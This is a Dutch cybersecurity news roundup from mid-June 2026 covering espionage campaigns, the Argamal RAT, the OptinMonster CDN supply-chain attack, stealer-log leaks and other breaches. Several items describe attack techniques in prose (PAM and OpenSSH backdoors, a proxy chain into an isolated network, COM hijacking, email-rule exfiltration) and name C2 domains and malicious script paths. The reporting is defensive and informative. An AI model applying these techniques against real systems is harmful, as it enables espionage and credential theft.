14 juni 2026 | Chinese hackers bespioneerden geïsoleerd netwerk tien jaar via gehijackte authenticatie

Onderzoekers van Sygnia hebben een complexe cyberespionagecampagne blootgelegd, genaamd "Operation Highland", die wordt toegeschreven aan de Chinese cyberespionagegroep Velvet Ant. Deze groep wist gedurende tien jaar, van 2016 tot 2026, onopgemerkt te opereren binnen een geïsoleerd kritieke infrastructuur netwerk van een grote organisatie. De aanvallers kregen volledige inzage in de administratieve activiteiten door de authenticatiestroom te kapen.

De campagne begon in 2016 met het compromitteren van kwetsbare internetgerichte systemen. Hoewel de specifieke kwetsbaarheid voor de initiële toegang niet is gespecificeerd, is bekend dat Velvet Ant eerder gebruikmaakte van kwetsbaarheden in F5 BIG-IP apparaten en een zero-day in Cisco NX-OS op Nexus switches. Eenmaal binnen, zette Velvet Ant een gemodificeerde GS-Netcat reverse shell in, vermomd als een legitiem systeemcomponent, die via een versleutelde verbinding toegang gaf tot een externe shell. Persistentie werd gewaarborgd door middel van een kwaadaardige systemd service of door aanpassingen in opstartscripts.

Vervolgens installeerde de groep een aangepaste SOCKS5 proxy voor het tunnelen van netwerkverkeer, waardoor zij interne systemen konden bereiken die niet direct vanaf het internet toegankelijk waren. Deze proxy fungeerde als een daemon, vermomd als 'smbd -D', en gebruikte verschillende bestandsnamen en poorten op elke gecompromitteerde host, waardoor de servers als interne draaipunten dienden.

Het meest opmerkelijke aspect van de aanval was het creëren van een pad voor externe uitvoering naar het geïsoleerde netwerk. Velvet Ant modificeerde de configuratie van een gecompromitteerde internetgerichte Nginx server om speciaal gemaakte verzoeken door te sturen naar een gecompromitteerde backend server. De Nginx configuratie van de backend server werd eveneens aangepast om verzoeken door te sturen naar een FastCGI proces (fcgiwrap) dat op een aparte poort luisterde. Deze FastCGI wrapper fungeerde als een uitvoeringsbrug, verwerkte verzoeken en startte een aangepast binair bestand genaamd 'uptime'. Dit hulpmiddel legde SSH-verbindingen met systemen binnen het geïsoleerde netwerk met behulp van parameters die werden geleverd in HTTP POST verzoeken. Sygnia stelt dat door deze aanpassingen aan elkaar te schakelen, Velvet Ant een pad voor externe uitvoering naar de gesegregeerde omgeving creëerde via eenvoudige HTTP verzoeken, zonder dat er ooit een directe verbinding met het kritieke infrastructuurnetwerk nodig was.

Nadat de toegang tot de geïsoleerde omgeving was gevestigd, richtte Velvet Ant zich op langdurige persistentie en het stelen van inloggegevens. Dit deden zij door Linux Pluggable Authentication Modules (PAM) aan te vallen. De aanvallers vervingen legitieme 'pam_unix.so' modules door gebackdoorde versies die hardgecodeerde wachtwoorden accepteerden en gebruikersgegevens verzamelden. Sygnia identificeerde negen verschillende varianten van deze kwaadaardige PAM module, wat duidt op een goed gefinancierde dreigingsactor. Ook werden OpenSSH componenten zoals ssh, sshd en scp vervangen door getrojaniseerde versies die inloggegevens vastlegden, commando's logden die tijdens SSH-sessies werden ingevoerd, en de verzamelde data lokaal opsloegen voor latere opvraging.

Door de controle over het authenticatieproces uit te breiden via de aanpassing van PAM en OpenSSH componenten, had de dreigingsactor toegang tot inloggegevens zodra deze in de doelomgeving werden gebruikt en kon de authenticatiestroom worden omzeild. Administratieve activiteiten werden volledig observeerbaar, inclusief elke login en elk uitgevoerd commando. Dit zorgde voor persistentie ondanks wachtwoordwijzigingen en beëindiging van sessies, en verminderde de effectiviteit van conventionele tegenmaatregelen.

Het opruimen van de gecompromitteerde omgeving bleek uiterst complex, omdat zoveel kritieke componenten waren vervangen. Het verwijderen ervan kon leiden tot het verbreken van de authenticatie en operationele storingen. De onderzoekers moesten een testomgeving bouwen om het binaire vervangingsproces te valideren voordat zij tot actie overgingen.

 

Bron: Sygnia

15 juni 2026 | Nieuwe malware Argamal schuilt in werkende games voor volwassenen

Beveiligingsbedrijf Kaspersky ontdekte in april 2026 een nieuwe campagne waarbij malware wordt verspreid via gedownloade games voor volwassenen, ook wel hentai games genoemd. De malware, Argamal, zit verborgen in de installatiebestanden van die spellen en werkt als een Remote Access Trojan (RAT). Daarmee kunnen aanvallers de volledige controle over de computer van een slachtoffer overnemen.

Opvallend is dat de geïnfecteerde downloads, in tegenstelling tot veel internetoplichting met corrupte bestanden, daadwerkelijk volledig werkende spellen bevatten. Die spellen zijn gebouwd op gangbare systemen zoals RenPy of RPG Maker. Het spel start en werkt naar behoren, waardoor gebruikers niet doorhebben dat hun systeem onder controle van een buitenstaander is gekomen.

De kwaadaardige bestanden worden verspreid via diverse platforms, waaronder websites voor volwassen spellen, bestandsdeeldiensten zoals PixelDrain en torrent trackers zoals AniRena. Zodra het gedownloade archief wordt geopend en het spel start, lanceert het een gemanipuleerde versie van een standaard bibliotheekbestand (FFmpeg DLL) en een tweede bestand met de naam natives2_blob.bin.

Die gemanipuleerde bibliotheek wordt zonder waarschuwing in het computergeheugen geladen en voert meteen een script in PowerShell uit. Om detectie te omzeilen controleert het script eerst of er monitoringtools zoals Sandboxie of Procmon64 actief zijn. Lijkt de computer veilig, dan blijft de malware drie dagen inactief. Daarna opent een geplande taak die via de tool bitsadmin.exe een versleuteld bestand (zaesdl.dat) van GitHub downloadt. Dat bestand wordt vervolgens met de versleutelingsstandaard AES in de CBC modus ontsleuteld om de eigenlijke trojan op te bouwen.

Voor blijvende toegang gebruikt de malware een techniek die COM hijacking heet. Daarbij past het de registervermeldingen aan van een legitiem onderdeel van Windows, de Windows Color System Calibration Loader. Omdat dat onderdeel telkens draait wanneer een gebruiker zich aanmeldt, start de malware automatisch bij elke nieuwe sessie.

Zodra Argamal actief is, stuurt het meteen signalen via het netwerkprotocol UDP naar de servers van de aanvallers, gehost op domeinen als asper1.freeddns.org en Winst0.kozow.com. De aanvallers krijgen daarmee volledige controle over het systeem. Ze kunnen onder meer bestanden stelen, privéchats meelezen, financiële gegevens verzamelen, schermafbeeldingen maken, adressen van cryptowallets omwisselen en live videobeelden bekijken.

Kaspersky detecteerde tot nu toe honderden geïnfecteerde gebruikers, vooral in Rusland, Brazilië, Duitsland en Vietnam. Uit de code blijkt dat de aanvallers vermoedelijk Spaanstalig zijn. Opvallend is dat de malware bewust gebruikers in China vermijdt. Spelers van dit soort games wordt aangeraden ongeverifieerde websites voor volwassenen te mijden en altijd actuele beveiligingssoftware te gebruiken.

 

Bron: Kaspersky

16 juni 2026 | Cyberaanvallen versnellen, van initiële toegang tot datadiefstal in 72 minuten

Onderzoek door Unit 42, de dreigingsanalyse-eenheid van Palo Alto Networks, toont aan dat de tijdslijnen van cyberaanvallen drastisch zijn verkort. Volgens hun "2026 Unit 42 Global Incident Response Report" kunnen aanvallers in de snelste gevallen binnen slechts 72 minuten van initiële toegang tot bevestigde data-exfiltratie overgaan. Dit vertegenwoordigt een versnelling van maar liefst vier keer ten opzichte van het voorgaande jaar.

Deze dramatische snelheidstoename wordt toegeschreven aan het groeiende gebruik van kunstmatige intelligentie (AI) door aanvallers om delen van de aanvalscyclus te automatiseren en te versnellen. De bevindingen van Unit 42, gebaseerd op klantomgevingen, Security Operations Center (SOC)-evaluaties, threat hunting-activiteiten en onderzoeken aan de frontlinie, wijzen op een "snelheidskloof" als een van de grootste operationele uitdagingen voor moderne SOC's.

Het rapport benadrukt dat deze kloof geen probleem is van personeel, maar van processen. Wanneer beveiligingsoperaties nog afhankelijk zijn van handmatige triage en gefragmenteerde workflows, zijn verdedigers gedwongen te opereren op een tijdslijn die moderne aanvallers al hebben overtroffen. Tegen de tijd dat een waarschuwing handmatig is gevalideerd, hebben aanvallers hun doel vaak al bereikt.

Unit 42 heeft een consistent patroon van identiteits-gebaseerde aanvallen waargenomen. Aanvallers maken misbruik van gecompromitteerde inloggegevens, manipulatie van identiteiten, escalatie van privileges en snelle laterale beweging om aanvallen die voorheen dagen duurden, nu binnen uren of zelfs minuten uit te voeren. Dreigingsactoren zoals Muddled Libra (ook bekend als Scattered Spider) en Spoiled Scorpius, die RansomHub ransomware verspreiden, zijn voorbeelden van deze bredere trend.

Het aanvals-playbook van de criminelen omvat doorgaans vier fases. In de eerste fase, Social Entry genoemd, wordt initiële toegang vaak verkregen via gecompromitteerde inloggegevens, manipulatie van multi-factor authenticatie (MFA), imitatie van helpdeskmedewerkers of andere identiteits-gebaseerde tactieken. Volgens het rapport werd 65% van de initiële toegang gedreven door dergelijke technieken.

In de tweede fase, Rapid Escalation genoemd, proberen aanvallers eenmaal binnen vaak binnen enkele minuten of uren privileges te escaleren en misbruik te maken van administratieve accounts. Unit 42 observeerde hoe verdachte identiteitsactiviteit snel escaleerde naar abnormaal administratief gedrag en tekenen van privilege-escalatie.

In de derde fase, Multi-Surface Pivot genoemd, bewegen aanvallers steeds vaker over verschillende omgevingen, waaronder identiteitssystemen, endpoints, cloud- en Software as a Service (SaaS)-omgevingen. Zodra verhoogde privileges zijn verkregen, kunnen zij cloud-bronnen inrichten, kwaadaardige virtuele machines creëren, virtuele schijven koppelen of persistentie bewerkstelligen ter ondersteuning van data-staging en exfiltratie.

In de vierde fase, Rapid Impact genoemd, tonen onderzoeken van Unit 42 aan dat aanvallers de tijd tussen initiële toegang en zakelijke impact comprimeren. In sommige gevallen hebben dreigingsactoren zoals Spoiled Scorpius honderden gigabytes aan gegevens geëxfiltreerd binnen enkele uren na het verkrijgen van toegang.

Dit onderzoek onderstreept de noodzaak voor organisaties om hun verdediging te moderniseren en processen te optimaliseren om gelijke tred te houden met de toenemende snelheid en automatisering van cyberaanvallen.

 

Bron: Unit 42 | Bron 2: mastodon.social | Bron 3: paloaltonetworks.com

16 juni 2026 | Chinese hackers misbruiken Google Workspace voor diefstal onderzoeksdata

Een aan China gekoppelde spionagegroep heeft meer dan een jaar lang onopgemerkt geopereerd binnen Noord-Amerikaanse medische, academische en militaire onderzoeksnetwerken, waarbij gevoelige onderzoeks- en defensie-e-mails werden gestolen. De aanval omvatte een backdoor op onderzoeksservers van REDCap om inloggegevens te bemachtigen, gevolgd door een innovatieve exfiltratiemethode via misbruik van regels van Google Workspace.

Google's Threat Intelligence Group (GTIG) heeft deze campagne, toegeschreven aan UNC6508, deze week in een rapport gedetailleerd beschreven. Eerder in februari bracht Google UNC6508 al aan het licht in een breder rapport over door de staat gesteunde aanvallen op de defensiesector. De slachtoffers waren diverse organisaties in de Verenigde Staten en Canada, waaronder klinische zorgverleners, academische centra en militaire gezondheidsinstellingen. Google heeft de getroffen entiteiten geïnformeerd en de infrastructuur van de groep ontwricht.

Het initiële toegangspunt was REDCap (Research Electronic Data Capture), een webplatform voor medische en academische studiedatabases. UNC6508 compromitteerde extern toegankelijke servers van REDCap. Hoewel de exacte initiële toegangsmethode onbekend is, werd waargenomen dat de groep oudere, kwetsbare versies testte. Ongeveer drie maanden na de inbraak implementeerde de groep de malware 'INFINITERED'. Deze malware trojaniseert systeembestanden van REDCap, kaapt het upgradeproces om zichzelf te behouden, verzamelt versleutelde gebruikersnamen en wachtwoorden van de inlogpagina en fungeert als een backdoor via HTTP-cookies.

De vroegst bekende compromittering dateert van september 2023, met activiteiten die doorgingen tot november 2025. Na toegang tot de server voerde UNC6508 interne verkenning uit en verzamelde database- en serviceaccountgegevens. Deze werden gebruikt om verder in het netwerk te bewegen en uiteindelijk een beheerdersaccount van het domein te bemachtigen.

De exfiltratie van e-mails maakte handig gebruik van een legitieme functie van Google Workspace, de zogeheten content compliance rules. Deze regels scannen e-mails op trefwoorden en kunnen overeenkomende berichten kopiëren of doorsturen. De aanvallers creëerden een regel die zocht naar bijna 150 trefwoorden, waaronder termen gerelateerd aan geo-strategisch beleid, militaire uitrusting, geavanceerde technologieën zoals AI en onbemande voertuigen, offensieve cyberprogramma's en medisch onderzoek (zoals 'chikungunya'). Wanneer een e-mail overeenkwam, werd deze stilzwijgend via BCC doorgestuurd naar een door de aanvaller beheerd Gmail-adres, dat inmiddels door Google is uitgeschakeld. Deze methode vereiste geen malware op de mailserver of ongebruikelijk netwerkverkeer, enkel misbruik van een ingebouwde functie.

Hoewel het misbruik van e-mail doorstuurregels door MITRE al is gecatalogiseerd, merkt GTIG op dat het gebruik van domein content compliance rules voor dit doel nieuw is voor een aan China gekoppelde actor.

Als mitigatiemaatregelen wordt organisaties geadviseerd extern toegankelijke servers van REDCap te patchen en oude versies te verwijderen om downgrade aanvallen te voorkomen. Verder is het essentieel om content compliance en e-mail doorstuurregels in Google Workspace of vergelijkbare systemen te controleren op externe doorstuuradressen. Beheerdersauditlogs moeten worden gecontroleerd op onverwachte regelwijzigingen. Het implementeren van phishing-resistente MFA voor beheerdersaccounts wordt sterk aanbevolen, aangezien de e-maildiefstal afhing van beheerdersrechten. Het misbruik van ingebouwde cloudfuncties als exfiltratiepad is een kritiek aandachtspunt voor verdedigers.

 

Bron: Google Threat Intelligence Group

16 juni 2026 | Miljoenen gelekte credentials ontdekt in stealer logs, advies voor Nederlanders

Have I Been Pwned (HIBP) heeft in juni 2026 een omvangrijke verzameling stealer logs toegevoegd aan zijn database, die miljoenen unieke e-mailadressen en wachtwoorden bevat. De corpus, afkomstig van diverse bronnen, omvat 56,3 miljoen unieke e-mailadressen en maar liefst 124 miljoen unieke wachtwoorden. Deze wachtwoorden zijn inmiddels ook opgenomen in HIBP's Pwned Passwords, waardoor ze doorzoekbaar zijn geworden.

De gelekte data, die voornamelijk bestaat uit e-mailadressen en bijbehorende wachtwoorden, is het resultaat van informatie die is buitgemaakt door stealer malware. Deze kwaadaardige software is ontworpen om gevoelige informatie, zoals inloggegevens, van geïnfecteerde systemen te stelen. De inbreuk vond plaats in juni 2026 en de gegevens zijn op 15 juni 2026 aan de HIBP-database toegevoegd.

Individuen die willen controleren of hun e-mailadres is getroffen, kunnen dit doen via het stealer logs gedeelte van hun persoonlijke HIBP-dashboard. Organisaties hebben de mogelijkheid om via de stealer logs API te achterhalen of hun domeinen zijn beïnvloed door deze datalekken.

Als reactie op deze massale compromittering worden gebruikers met klem geadviseerd om onmiddellijk actie te ondernemen. De belangrijkste aanbeveling is om alle wachtwoorden die mogelijk zijn getroffen door de inbreuk te wijzigen, vooral als deze wachtwoorden op meerdere accounts zijn hergebruikt. Daarnaast wordt sterk aangeraden om twee-factor authenticatie (2FA) in te schakelen op alle accounts waar dit wordt ondersteund, om een extra beveiligingslaag toe te voegen. Het gebruik van een wachtwoordmanager kan tevens helpen bij het genereren en veilig opslaan van sterke, unieke wachtwoorden voor alle online diensten.

In Nederland wordt, conform de adviezen van Veiliginternetten.nl, een samenwerking van publieke en private organisaties die zich inzet voor online veiligheid, het belang van deze basisbeveiligingstips benadrukt. De omvang van deze gelekte stealer logs onderstreept de voortdurende dreiging van credential stuffing en het belang van proactieve beveiligingsmaatregelen voor alle internetgebruikers, inclusief die in Nederland en België.

 

Bron: Have I Been Pwned | Bron 2: veiliginternetten.nl

16 juni 2026 | OptinMonster WordPress plugins getroffen door supply chain aanval via CDN

Populaire WordPress plugins OptinMonster, TrustPulse en PushEngage zijn het slachtoffer geworden van een supply-chain aanval die het content distribution network (CDN) van Awesome Motive trof. OptinMonster, een platform voor leadgeneratie en conversie-optimalisatie, is met meer dan 1,2 miljoen websites de meest gebruikte van de drie.

De aanval werd ontdekt door het e-commerce beveiligingsbedrijf Sansec. Tussen 22:17 UTC en 22:42 UTC op vrijdag 12 juni werden malafide scripts geserveerd aan gebruikers van OptinMonster en TrustPulse. PushEngage bleef de kwaadaardige JavaScript-code zelfs tot zaterdag 13 juni, 19:02 UTC, verspreiden. De malware activeerde alleen wanneer een WordPress-beheerder een pagina bezocht op een geïnfecteerde website. Hierbij werden authenticatietokens en nonces verzameld, die vervolgens werden misbruikt om een malafide beheerdersaccount aan te maken.

Na het aanmaken van het valse beheerdersaccount installeerden de aanvallers een zelfverbergende backdoor-plugin en legden een communicatiekanaal aan met een domein dat Tidio imiteerde. Via dit kanaal werden nieuw buitgemaakte gegevens verzonden. De backdoor-plugin, die Sansec heeft waargenomen onder namen als "Content Delivery Helper" (content-delivery-helper, v2.7.1) en "Database Optimizer" (database-optimizer, v2.9.4), bood volledige toegang op afstand. Dit omvatte een webshell ("WPM File Manager & Shell") en de mogelijkheid tot uitvoering van willekeurige PHP-code, waardoor aanvallers volledige controle kregen over de gecompromitteerde websites.

Awesome Motive heeft in een beveiligingsadvies uitgelegd dat de hackers toegang kregen tot een server in hun omgeving door misbruik te maken van een bekende kwetsbaarheid in de UpdraftPlus WordPress plugin. Deze server hostte een marketingwebsite en was niet verbonden met de productie-infrastructuur of datasystemen van het bedrijf. Wel bevatte deze server inloggegevens voor het CDN-account van het bedrijf, die de hackers buitmaakten. Met de gestolen CDN API-sleutel pasten de aanvallers JavaScript-bestanden aan die via het CDN van Awesome Motive werden gedistribueerd, waardoor websites ongemerkt kwaadaardige code rechtstreeks vanaf het CDN laadden. De getroffen bestanden waren onder andere a.omappapi.com/app/js/api.min.js, a.opmnstr.com/app/js/api.min.js en a.optnmstr.com/app/js/api.min.js voor OptinMonster, en a.trstplse.com/app/js/api.min.js voor TrustPulse.

Awesome Motive meldt dat de malafide scripts voor een korte periode op 12 juni werden geserveerd voor OptinMonster en TrustPulse, maar bevestigt de impact op PushEngage niet expliciet. Het bedrijf heeft de marketingwebsite hersteld, gemigreerd naar een nieuwe server en alle inloggegevens, inclusief de CDN API-sleutel, vernieuwd. Awesome Motive benadrukt dat hun applicatieservers, broncode en plugin-hosting servers niet zijn gecompromitteerd en dat er geen bewijs is dat accountgegevens of persoonlijke details die zij bewaren, zijn benaderd.

Website-eigenaren die mogelijk zijn getroffen, wordt aangeraden om te controleren op en malafide beheerdersaccounts zoals 'developer_api1' of 'dev_xxxxxx' te verwijderen. Ook moeten ze het bestandssysteem direct onder wp-content/plugins inspecteren op verborgen backdoor-plugins en server-side malware scans uitvoeren. Verder is het essentieel om beheerderswachtwoorden, API-sleutels, database-inloggegevens en WordPress security salts te vernieuwen. Hoewel de kwaadaardige inhoud van het CDN is verwijderd, behouden de aanvallers toegang tot gecompromitteerde websites zolang de malafide beheerdersaccounts en verborgen backdoor-plugins aanwezig blijven.

 

Bron: Sansec | Bron 2: optinmonster.com | Bron 3: hubs.li

16 juni 2026 | CISOs worstelen met 'code sprawl' door opkomst AI-gedreven ontwikkeling

Securityleiders van Datadog, Jamf en ASOS hebben hun zorgen geuit over de groeiende 'code sprawl', een fenomeen waarbij de mogelijkheid om code te schrijven, gedreven door kunstmatige intelligentie (AI), in handen komt van vrijwel elke medewerker binnen een organisatie. Dit leidt tot een crisis in zichtbaarheid en controle, zo werd besproken tijdens Workflow, een virtueel evenement georganiseerd door het intelligent automatiseringsplatform Tines.

Andrew Steele, partner bij Activant Capital en moderator van het evenement, benadrukte de aantrekkingskracht van AI voor het bouwen van automatiseringen en applicaties. Tegelijkertijd waarschuwde hij voor de risico's wanneer deze impuls zich ongecontroleerd verspreidt binnen een organisatie. Veel werknemers zijn zich onvoldoende bewust van waar persoonlijke experimenten eindigen en bedrijfsrisico's beginnen.

Code sprawl is geen nieuw concept, maar neemt in 2026 een ongekende vlucht. Security- en IT-teams vergelijken de situatie met onkruid dat zich snel verspreidt en dreigt alles te overwoekeren. Een rapport van RedAccess ondersteunt deze observatie door te stellen dat er 380.000 publiekelijk toegankelijke assets, waaronder applicaties, databases en gerelateerde infrastructuur, zijn gevonden die zijn gebouwd buiten elke beveiligingsreview. Ongeveer 5.000 hiervan bevatten gevoelige bedrijfsinformatie.

Deze ongecontroleerde code komt uit diverse bronnen, zoals AI-functies die zijn ingebed in goedgekeurde SaaS-tools en geactiveerd zonder IT-toezicht, scripts en automatiseringen die buiten goedgekeurde omgevingen zijn gebouwd, en agents die door individuele teams zijn opgezet zonder centrale zichtbaarheid. De intentie is vaak goed, maar het resultaat is een gebrek aan controle. Het concept van "vibe coding" (informeel code schrijven) verschijnt zelfs in vacatures bij bedrijven uit de Fortune 500, wat elke medewerker die hierop reageert tot een potentiële bron van ongecontroleerde code maakt.

Matt Muller, Director of Security Operations bij Datadog, merkte op dat medewerkers uiterst vindingrijk zijn in het vinden van manieren om hun werk te doen. Als zij denken dat toegang tot het nieuwste AI model hen daarbij helpt, zullen ze een weg vinden, zelfs als dat betekent dat ze screenshots van hun computers maken met hun telefoon om data over te dragen naar een persoonlijk account. Het verbieden van voor de hand liggende tools verplaatst het gedrag vaak naar minder voor de hand liggende kanalen, waardoor de zichtbaarheid afneemt zonder de blootstelling te verminderen.

Indu Sajeev, voormalig CISO bij ASOS, stelde dat een governance laag die uitsluitend gebaseerd is op papier en beleid onvoldoende is. Governance moet gecodificeerd zijn en continu draaien op het niveau van kritieke infrastructuur.

Om dit probleem aan te pakken, beginnen securityleiders met de basis. Mario Villatoro, CISO bij Jamf, benadrukt het belang van correcte dataclassificatie. Zonder een duidelijke definitie en tagging van "gevoelige data" zijn alle verdere controles, zoals toegangsrechten, beheer van agents en auditsporen, op onstabiele grond gebouwd.

Muller van Datadog heeft gekozen voor een aanpak waarbij het securityteam fungeert als een centrale hub voor tools, in plaats van een poortwachter. Door AI-vaardigheden beschikbaar te maken via een interne marktplaats en engineeringteams om feedback te vragen, wordt de beheerste weg aantrekkelijker gemaakt dan de onbeheerste. Dit principe is cruciaal, vooral omdat code sprawl zich uitstrekt tot afdelingen als HR, marketing en financiën, waar securitybewustzijn zelden een primaire functie-eis is. Indu Sajeev van ASOS werkt aan een register voor gebruiksscenario's om meer zichtbaarheid te creëren.

 

Bron: Tines | Bron 2: watch.workflow.live

16 juni 2026 | Chinese staatsactor UNC6508 viseert medische en militaire onderzoeksinstituten

De Google Threat Intelligence Group (GTIG) heeft een geavanceerde cybercampagne blootgelegd, toegeschreven aan UNC6508, een dreigingsactor die gelinkt is aan de Volksrepubliek China (PRC). Deze campagne richtte zich op academische, medische en militaire onderzoeksinstituten in Noord-Amerika. De dreigingsactor bleef meer dan een jaar onopgemerkt en had brede verzamelambities, waaronder gevoelige defensie-informatie met betrekking tot nationale veiligheid, commandovoering in de Indo-Pacifische regio, kunstmatige intelligentie, systemen voor onbemande voertuigen, cyberoffensieve programma's en medisch onderzoek.

De campagne begon al in september 2023. UNC6508 wist externe webapplicaties te compromitteren, specifiek REDCap (Research Electronic Data Capture) servers. Hierbij werd op maat gemaakte malware genaamd INFINITERED ingezet om legitieme REDCap inloggegevens te stelen. Na het verkrijgen van deze referenties, wist de actor toegang te krijgen tot de interne netwerken van de slachtoffers. Daarnaast werd misbruik gemaakt van administratieve tools voor bedrijven om data heimelijk te exfiltreren. Een opvallende en nieuwe techniek die werd waargenomen, was het manipuleren van regels voor domeininhoudsconformiteit voor data-exfiltratie. UNC6508 maakte tevens gebruik van geavanceerde operationele beveiliging (OpSec) technieken om hun activiteiten te verhullen en te verdoezelen.

De doelwitten omvatten een breed scala aan nationale, staats- en private medische entiteiten, waaronder gerenommeerde klinische zorgverleners, vooraanstaande academische centra, militaire gezondheidsinstellingen in Noord-Amerika, professionele belangenbehartigers en regulerende instanties in de gezondheidszorg. Hun onderzoek bestrijkt een breed spectrum van de moderne geneeskunde, van moleculaire ontdekking en klinische medicijnproeven tot volksgezondheidsbeleid op staatsniveau en militaire paraatheid.

GTIG heeft de kwaadaardige infrastructuur die aan deze dreigingsactor is gekoppeld, ontwricht. In samenwerking met Mandiant Consulting zijn de getroffen organisaties op de hoogte gebracht en hulp aangeboden bij het herstel. Google Security Operations is bijgewerkt met relevante inlichtingen, waardoor verdedigers indicators of compromise (IOC's) binnen hun netwerken kunnen identificeren.

Om dergelijke dreigingen te mitigeren, adviseert GTIG beveiligingsmaatregelen te implementeren voor alle bedrijfsplatforms in de cloud. Dit omvat het afdwingen van phishing-resistente twee-staps verificatie (2SV) voor accounts van bedrijfsbeheerders, ook via externe identiteitsproviders. Verder wordt overwogen om zeer gevoelige accounts in te schrijven voor het Advanced Protection Program voor extra beveiliging tegen malware- en phishingaanvallen, en het afdwingen van Device Bound Session Credentials om het stelen van cookies te voorkomen.

 

Bron: Google Threat Intelligence Group | Bron 2: virustotal.com | Bron 3: attack.mitre.org

16 juni 2026 | ShinyHunters steelt data van 137.000 schoolmedewerkers via aanval op Salesforce

De ShinyHunters afpersingsgroep heeft persoonlijke informatie gestolen van meer dan 137.000 accounts van schoolmedewerkers. Dit gebeurde via een datadiefstal aanval op Salesforce die gericht was op het veelgebruikte Infinite Campus K-12 studenteninformatiesysteem in maart. Infinite Campus is een onderwijstechnologiebedrijf dat een studenteninformatiesysteem levert aan meer dan 3.200 schooldistricten in de Verenigde Staten, waarmee het gegevens van 11 miljoen studenten in 46 staten beheert.

Hoewel Infinite Campus het incident in maart niet aan een specifieke hackinggroep toeschreef toen het klanten op de hoogte bracht van de inbreuk, beschreef het de aanvaller als "onderdeel van een groep die bekend staat om het richten op de Salesforce accounts van honderden bedrijven." Het bedrijf liet de getroffen klanten ook weten dat de blootgestelde gegevens namen en contactgegevens van schoolpersoneel en andere openbaar beschikbare informatie bevatten, maar voegde eraan toe dat er geen bewijs was dat klantdatabases waren gecompromitteerd. "Hun doel was de Salesforce-instantie van Infinite Campus, bestaande uit namen en contactinformatie voor schoolpersoneel; het merendeel is directory-informatie die veelvuldig op schoolwebsites te vinden is," aldus Infinite Campus.

De ShinyHunters groep claimde verantwoordelijkheid voor de inbreuk op zijn dataleksite en lekte een 1,2 GB archief van documenten die naar verluidt Salesforce-records met persoonlijk identificeerbare informatie en andere interne bedrijfsgegevens bevatten. De datalek notificatiedienst Have I Been Pwned analyseerde de gelekte gegevens en stelde dat de inbreuk gegevens van 137.100 accounts heeft blootgesteld, waaronder unieke namen, e-mailadressen, werkgevers, functietitels, telefoonnummers, fysieke adressen, gebruikersnamen en supporttickets.

Het incident bij Infinite Campus vertoont overeenkomsten met de PowerSchool hack in december 2024, hoewel de impact aanzienlijk verschilt. De PowerSchool inbreuk trof 62 miljoen studenten. De persoon achter die aanval, een 19-jarige student uit Massachusetts, kreeg in mei 2025 vier jaar cel na een schuldbekentenis.

ShinyHunters heeft het afgelopen jaar veel Salesforce-klanten aangevallen en beweerde meer dan 1,5 miljard records te hebben gestolen na inbreuken op honderden bedrijven tijdens de Salesloft Drift hack en de Salesforce Aura campagne. Meer recentelijk heeft de afpersingsgroep de verantwoordelijkheid opgeëist voor een nieuwe datadiefstal campagne die een zero-day kwetsbaarheid in Oracle's PeopleSoft enterprise business software suite misbruikt om gegevens te stelen van meer dan 100 organisaties, waaronder de Universiteit van Nottingham.

 

Bron: Have I Been Pwned | Bron 2: hubs.li

16 juni 2026 | Arch Linux User Repository wederom doelwit van aanvallen met malware

De Arch Linux User Repository (AUR) is opnieuw getroffen door aanvallen met malware, waarbij diverse softwarepakketten zijn voorzien van kwaadaardige code. Vorige week slaagden aanvallers er al in om bijna tweeduizend bestaande pakketten te infecteren. Aanvankelijk werd gesproken over ongeveer vierhonderd getroffen pakketten, maar dit aantal bleek achteraf aanzienlijk hoger te liggen. De toegevoegde malware is specifiek ontworpen om inloggegevens te stelen van de systemen waarop deze pakketten worden uitgevoerd.

De Arch User Repository is een door de community onderhouden opslagplaats waar Arch gebruikers allerlei softwarepakketten kunnen vinden. De structuur van de repository maakt het voor iedereen mogelijk om pakketten die niet meer worden beheerd, te 'adopteren' als maintainer. Aanvallers hebben misbruik gemaakt van deze functionaliteit door te zoeken naar dergelijke onbeheerde pakketten. Na het indienen van een verzoek om maintainer te worden, voegden zij vervolgens malafide code toe aan de pakketten.

Afgelopen weekend is er gewaarschuwd voor een nieuwe golf aanvallen. Deze keer werden de pakketten voorzien van 'iets geavanceerdere' malware, wat duidt op een verdere ontwikkeling van de aanvalsmethoden. De maintainers van de AUR zijn momenteel druk bezig met het verwijderen van de besmette pakketten en de accounts die hiervoor verantwoordelijk zijn. Website Phoronix heeft zich verrast getoond dat de Arch Linux User Repository niet volledig wordt gesloten totdat de veiligheid van de aangeboden pakketten beter kan worden gegarandeerd.

 

Bron: Deze informatie is afkomstig van een anonieme tip aan Cybercrimeinfo

16 juni 2026 | Handala hackgroep claimt datalek bij California Water Service

De aan Iran gelinkte hackgroep Handala beweert een inbreuk te hebben gepleegd op de systemen van California Water Service (Cal Water), een belangrijke nutsbedrijf dat twee miljoen mensen in honderd gemeenschappen in Californië van water voorziet. De groep stelt dat de aanval een vergelding is voor Amerikaanse acties in Iran. Dit incident, waarbij kritieke infrastructuur werd getroffen, baart zorgen over de beveiliging van publieke voorzieningen.

Op 11 juni 2026 ontdekte het onderzoeksbureau Dataminr dat de groep opschepte over de inbreuk en daarbij vijf gigabyte aan data publiceerde. Experts hebben bevestigd dat klantgegevens uit het Chico District van Cal Water daadwerkelijk zijn getroffen. De gelekte bestanden omvatten namen, thuisadressen, telefoonnummers, accountnummers en betalingsgeschiedenis, afkomstig uit een klantfactureringsdatabase. Daarnaast werd netwerkinfrastructuur blootgesteld van zeven afzonderlijke operationele gebieden, waaronder Bakersfield, Chico, Salinas, Stockton, Visalia, San Mateo en een regionaal engineering segment.

De hackers kregen toegang tot een intern systeem genaamd RTKBase, een eenvoudig hulpmiddel dat door veldploegen wordt gebruikt om precieze GPS-gegevens te verkrijgen voor het in kaart brengen en repareren van waterleidingen. Door wachtwoorden van dit systeem te stelen, slaagden de aanvallers erin om door te dringen tot het factureringsnetwerk. Hoewel Handala in hun berichten beweerde de watertoevoer te kunnen afsluiten, is dit niet gebeurd. Beveiligingsteams merken op dat Handala in eerdere campagnes wel destructieve software gebruikte om computersystemen te wissen, maar dat er tot op heden geen manipulatie van waterbehandelingsprocessen is vastgesteld.

